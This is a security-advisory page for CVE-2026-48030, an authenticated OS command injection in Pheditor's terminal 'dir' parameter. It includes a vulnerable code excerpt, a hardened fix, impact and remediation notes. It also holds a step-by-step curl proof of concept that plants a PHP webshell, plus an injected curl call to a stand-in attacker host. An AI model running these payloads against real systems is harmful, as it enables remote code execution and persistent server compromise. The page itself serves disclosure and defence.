
Pheditor CVE-2026-48030

Severity: CRITICAL (CVSS 3.1 base score 9.9)
Weakness: OS Command Injection (CWE-78)
Published: 2026-06-09
Project: https://github.com/pheditor/pheditor
Advisory: GHSA-jvc5-6g7q-c843

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope: Changed
  • Confidentiality: High
  • Integrity: High
  • Availability: High

Lifecycle Timeline

  • Source Code Evidence Fetched: Jun 09, 2026 22:20 (vuln.today)
  • Analysis Generated: Jun 09, 2026 22:20 (vuln.today)
  • CVE Published: Jun 09, 2026 22:00 (nvd)

Description (NVD)

Summary

An OS Command Injection vulnerability in the terminal action handler allows any authenticated user to execute arbitrary OS commands by injecting shell metacharacters into the 'dir' POST parameter, completely bypassing the TERMINAL_COMMANDS whitelist and achieving full Remote Code Execution with web server privileges.

Details

The terminal handler in pheditor.php accepts two POST parameters: command and dir. Shell metacharacters are validated on $command only - $dir is passed to shell_exec() without any sanitization.

Vulnerable code (pheditor.php, line 554-586):

```php
$command = $_POST['command'];  // ✓ metacharacters checked
$dir     = $_POST['dir'];      // ✗ NOT checked - vulnerable

if (strpos($command, '&')  !== false ||
    strpos($command, ';')  !== false ||
    strpos($command, '||') !== false) {
    die(...); // only guards $command, not $dir
}

$output = shell_exec(
    (empty($dir) ? null : 'cd ' . $dir . ' && ')
    . $command . ' && echo \ ; pwd'  // ← $dir injected here
);
```

An attacker sends dir=/tmp; curl attacker.com # - the semicolon in $dir is never checked, so the injected command executes freely.

Fix: replace $dir with escapeshellarg($dir) on line 586.
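As an added example (not Pheditor's own code), the following shows the hardened way to build the same command string: it applies the upstream fix, escapeshellarg() on $dir, and additionally confines $dir to an assumed workspace root via realpath(). The TERMINAL_BASE_DIR constant, the build_terminal_command() function and the extended metacharacter list are assumptions for this example, not code from pheditor.php.

```php
<?php
// Added example, not Pheditor's own code. The upstream one-line fix is the
// escapeshellarg($dir) call; the realpath() confinement to a base directory
// is an extra defence-in-depth assumption made here.

const TERMINAL_BASE_DIR = '/var/www/html'; // assumed workspace root

function build_terminal_command(string $command, string $dir): ?string
{
    // Original guards only '&', ';' and '||' on $command; extended here.
    // The TERMINAL_COMMANDS whitelist check from the page is not reproduced.
    foreach (['&', ';', '||', '|', '`', '$(', "\n"] as $bad) {
        if (strpos($command, $bad) !== false) {
            return null; // caller answers "Command not allowed"
        }
    }

    $prefix = '';
    if ($dir !== '') {
        // Resolve symlinks and "..", and refuse anything that is not a real
        // directory. An injection-style value such as "/tmp; curl x #" does
        // not resolve to a directory, so it is rejected before any shell use.
        $real = realpath($dir);
        if ($real === false || !is_dir($real)) {
            return null;
        }
        $base = realpath(TERMINAL_BASE_DIR);
        $inside = $base !== false
            && ($real === $base
                || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0);
        if (!$inside) {
            return null; // outside the permitted workspace
        }
        // escapeshellarg() wraps the path in single quotes and escapes any
        // embedded quotes, so every shell metacharacter in $dir is literal.
        $prefix = 'cd ' . escapeshellarg($real) . ' && ';
    }

    return $prefix . $command . ' && echo ; pwd';
}

// Constructed inputs: a benign directory and the page's injection-style value.
$safe     = build_terminal_command('ls', TERMINAL_BASE_DIR);
$rejected = build_terminal_command('ls', '/tmp; curl attacker.com #');
```

Even if the realpath() confinement were dropped, the escapeshellarg() call alone turns the whole $dir value into a single quoted argument to cd, which is the behaviour the upstream patch relies on.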

PoC

Requirements: valid credentials, terminal permission enabled (default)

Step 1 - Authenticate:

```bash
curl -c cookies.txt -X POST http://TARGET/pheditor.php \
  -d "pheditor_password=admin" -L > /dev/null
```

Step 2 - Get CSRF token:

```bash
TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
  grep -o 'token = "[a-f0-9]*"' | \
  grep -o '"[a-f0-9]*"' | tr -d '"')
```

Step 3 - Confirm curl is blocked via command field:

```bash
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "command=curl https://ifconfig.me" \
  --data-urlencode "dir=/tmp"
```

→ {"error":true,"message":"Command not allowed"}

Step 4 - Bypass whitelist via dir injection:

```bash
TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
  grep -o 'token = "[a-f0-9]*"' | \
  grep -o '"[a-f0-9]*"' | tr -d '"')

curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "command=ls" \
  --data-urlencode "dir=/tmp; curl -s https://ifconfig.me #"
```

→ {"error":false,"message":"OK","dir":"<PUBLIC_IP>"}

Step 5 - Full RCE via webshell:

```bash
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "command=ls" \
  --data-urlencode "dir=/var/www/html; echo '<?php system($_GET["c"]);?>' > /var/www/html/shell.php #"

curl "http://TARGET/shell.php?c=id"
```

→ uid=33(www-data) gid=33(www-data) groups=33(www-data)

Impact

OS Command Injection (CWE-78). Any authenticated pheditor user with terminal permission enabled (default configuration) is able to:

  • Execute arbitrary OS commands as the web server user
  • Bypass the TERMINAL_COMMANDS whitelist entirely
  • Deploy persistent PHP webshells to the webroot
  • Read, write, or delete any file accessible to the web server
  • Potentially compromise other applications on the same server

Analysis (AI)

Authenticated remote code execution in Pheditor 2.0.1-2.0.3 lets any logged-in user with the default terminal permission bypass the TERMINAL_COMMANDS whitelist by injecting shell metacharacters into the unsanitized 'dir' POST parameter of pheditor.php, achieving full command execution as the web server user. Publicly available exploit code exists in the GitHub Security Advisory PoC, and the upstream commit confirms the root cause is missing escapeshellarg() on $dir before concatenation into shell_exec().


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

  • Recon: Reach exposed pheditor.php
  • Delivery: Authenticate with valid credentials
  • Exploit: Fetch CSRF token from page
  • Install: POST action=terminal with shell metacharacters in dir
  • C2: shell_exec() runs injected command as www-data
  • Execute: Drop PHP webshell in webroot
  • Impact: Persistent RCE and lateral movement

Vulnerability Assessment (AI)

Exploitation: Exploitation requires a valid Pheditor user session (CVSS PR:L) and that user must have the terminal permission enabled, which is the default configuration per the advisory, plus the pheditor.php endpoint must be network-reachable to the attacker. …

Risk Assessment: The CVSS 9.9 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) accurately reflects a network-reachable, low-complexity bug requiring only low privileges, with scope change because the resulting OS-level execution breaks out of the PHP application boundary. …

Exploit Scenario: An attacker who has obtained or guessed Pheditor admin credentials (or compromised a low-privileged user with the default terminal permission) authenticates, grabs the CSRF token from the main page, and POSTs to pheditor.php with action=terminal, a benign command=ls, and a malicious dir value such as '/var/www/html; echo "<?php system($_GET[c]); ?>" > shell.php #'. The injected payload drops a PHP webshell into the webroot, after which the attacker has persistent unauthenticated RCE as www-data; the full chain is demonstrated step-by-step in the vendor's GHSA PoC.

Remediation: Upgrade Pheditor to the vendor-released patch version 2.0.4 as tracked in GHSA-jvc5-6g7q-c843; the one-line fix replaces $dir with escapeshellarg($dir) on the shell_exec() call in pheditor.php (commit 62b43df7cb8956a9b0deb9bec278ca8676c890c5). …

Recommended Action (AI)

Within 24 hours: Identify and inventory all Pheditor instances running versions 2.0.1-2.0.3; restrict terminal permission access to essential personnel only. …



CVE-2026-48030 vulnerability details – vuln.today
